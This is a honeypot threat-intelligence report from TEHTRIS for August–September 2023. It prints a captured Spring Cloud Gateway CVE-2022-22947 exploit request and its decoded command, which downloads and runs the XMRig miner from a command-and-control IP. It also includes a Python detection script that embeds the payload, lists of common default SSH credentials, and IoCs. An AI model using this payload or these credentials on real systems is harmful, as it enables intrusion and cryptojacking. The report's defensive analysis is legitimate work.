
Our selection of alerts on honeypots: report 17 – September 2023

TEHTRIS believes in creating cyber threat intelligence based on empirical observations of what is happening in the cyberworld. To do so, we have deployed a large network of honeypots equipped with TEHTRIS solutions, and our team analyses the logs collected in the XDR Platform.

Keeping track of trends and keeping an eye on what threat actors actively scan during their reconnaissance phase allows us to adjust our cybersecurity posture and to detect weak signals of further malicious activity.

Check out our previous report here.

CVE-2022-22947 EXPLOIT ATTEMPTS

We have observed CVE-2022-22947 (CVSSv3: 10) exploit attempts on our honeypots network. This CVE affects Spring Cloud Gateway applications, which are vulnerable to code injection when the Gateway Actuator endpoint is enabled, exposed and unsecured.

On the 26th and the 27th of August, the US IP address 185.207.250[.]115, hosted by AS51167 (Contabo GmbH) and flagged as malicious in public databases, targeted our honeypots on port TCP/80. The affected devices are European honeypots hosted in the following countries: Spain, France, Estonia, Netherlands, Czech Republic, Finland, Portugal, Belgium, Ireland, Italy, and Poland.

Here is an example of the corresponding HTTP request captured by our honeypot:

POST /actuator/gateway/routes/AzMtdFlkrml HTTP/1.1
User-Agent: Custom-HttpClient

{
  "id": "AzMtdFlkrml",
  "filters": [{
    "name": "AddResponseHeader",
    "args": {
      "name": "Result",
      "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String(java.util.Base64.getDecoder().decode(\"cGtpbGwgLTkgLmZveG07IGNkIC90bXA7IHdnZXQgaHR0cDovLzE4NS4yMjUuNzUuMjQyL2Rvd25sb2FkL3htcmlnLng4Nl82NDsgY3VybCAtTyBodHRwOi8vMTg1LjIyNS43NS4yNDIvZG93bmxvYWQveG1yaWcueDg2XzY0OyBtdiB4bXJpZy54ODZfNjQgLmZveG07IGNobW9kICt4IC5mb3htOyAuLy5mb3ht\"))).getInputStream()))}"
    }
  }],
  "uri": "http://example.com"
}

This request exploits CVE-2022-22947 and executes a base64-encoded command on the victim.
The decoded command downloads the XMRig cryptocurrency miner and executes it:

pkill -9 .foxm; cd /tmp; wget http[:]//185.225.75[.]242/download/xmrig.x86_64; curl -O http[:]//185.225.75[.]242/download/xmrig.x86_64; mv xmrig.x86_64 .foxm; chmod +x .foxm; ./.foxm

The C2 (command and control) server, the Dutch IP address 185.225.75[.]242, is hosted by AS211252 (Delis LLC) and is known to the VirusTotal community: it has been reported for SSH credential attacks and linked to a miner.
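The request above is recognisable from a defender's side by its shape alone: a POST that defines a route on the gateway actuator whose filter argument carries a SpEL template (`#{...}`) referencing `java.lang.Runtime`. The following inspector, an added example that is not part of the TEHTRIS report or of Spring, parses such a request, scores it, and decodes any base64 literal handed to a decoder so the analyst sees the command; the captured request is the one from the report, the benign route and the `orders.internal` host are constructed for the test.

```python
import base64
import json
import re

ROUTE_PATH = re.compile(r"^/actuator/gateway/routes/[^/?\s]+$")   # actuator route-definition endpoint
SPEL_MARKER = re.compile(r"#\{")                                  # SpEL expression template opener
RUNTIME_REF = re.compile(r"T\(java\.lang\.Runtime\)")             # type reference that reaches exec()
B64_LITERAL = re.compile(r'decode\("([A-Za-z0-9+/=]+)"\)')        # base64 literal fed to a decoder

def parse_request(raw):
    """Split a raw HTTP/1.1 request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _ = lines[0].split(" ", 2)
    headers = dict(line.split(": ", 1) for line in lines[1:] if ": " in line)
    return method, path, headers, body

def _strings(node):
    """Yield every string value nested anywhere in a parsed JSON document."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, (dict, list)):
        for child in (node.values() if isinstance(node, dict) else node):
            yield from _strings(child)

def inspect_request(raw):
    """Return a finding dict for a route-definition request, or None for unrelated traffic."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or not ROUTE_PATH.match(path):
        return None
    finding = {"route_id": path.rsplit("/", 1)[1], "user_agent": headers.get("User-Agent", ""),
               "severity": "info", "decoded_commands": []}
    try:
        values = list(_strings(json.loads(body)))
    except ValueError:
        finding["severity"] = "medium"      # malformed body on an admin endpoint still merits review
        return finding
    if any(SPEL_MARKER.search(v) for v in values):
        finding["severity"] = "high" if any(RUNTIME_REF.search(v) for v in values) else "medium"
    for v in values:
        for blob in B64_LITERAL.findall(v):
            padded = blob + "=" * (-len(blob) % 4)   # Java's decoder accepts unpadded input, so tolerate it too
            finding["decoded_commands"].append(base64.b64decode(padded).decode("utf-8", "replace"))
    return finding

# Sample input: the request captured on the honeypot (from the report), then a constructed benign route.
CAPTURED = ("POST /actuator/gateway/routes/AzMtdFlkrml HTTP/1.1\r\nUser-Agent: Custom-HttpClient\r\n\r\n"
            r'{ "id": "AzMtdFlkrml", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String(java.util.Base64.getDecoder().decode(\"cGtpbGwgLTkgLmZveG07IGNkIC90bXA7IHdnZXQgaHR0cDovLzE4NS4yMjUuNzUuMjQyL2Rvd25sb2FkL3htcmlnLng4Nl82NDsgY3VybCAtTyBodHRwOi8vMTg1LjIyNS43NS4yNDIvZG93bmxvYWQveG1yaWcueDg2XzY0OyBtdiB4bXJpZy54ODZfNjQgLmZveG07IGNobW9kICt4IC5mb3htOyAuLy5mb3ht\"))).getInputStream()))}" } }], "uri": "http://example.com" }')
BENIGN = ("POST /actuator/gateway/routes/orders HTTP/1.1\r\nUser-Agent: curl/8.0\r\n\r\n"
          '{ "id": "orders", "predicates": [{ "name": "Path", "args": { "pattern": "/orders/**" } }], "uri": "http://orders.internal:8080" }')
```

Calling `inspect_request(CAPTURED)` yields a high-severity finding carrying the decoded miner command, while `inspect_request(BENIGN)` stays at info because a plain route definition contains no SpEL template.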

IoCs

  • 185.207.250[.]115
  • 185.225.75[.]242

For the month of August 2023, we have observed the following trends regarding malicious activities targeting SSH services on our worldwide honeypots network.

Top 10 credentials tested by threat actors:

Login          Password
345gs5662d34   345gs5662d34
admin          admin
0              0
ubnt           ubnt
root           password
root           root
admin          admin123
factory        factory
3comcso        RIP000
cameras        cameras

Top 10 most malicious IP addresses (all known from public databases):


Top ports/protocols targeted by threat actors – August 2023

Protocol   Port    %
TCP        445     18.833%
TCP        22      12.43%
TCP        80      6.273%
TCP        23      5.598%
TCP        6379    1.546%
TCP        443     1.22%
UDP        12522   1.166%
TCP        3389    0.964%
UDP        5060    0.641%
TCP        8443    0.508%

Top 10 most exploited CVEs – August 2023

CVE-2023-34362 EXPLOIT ATTEMPTS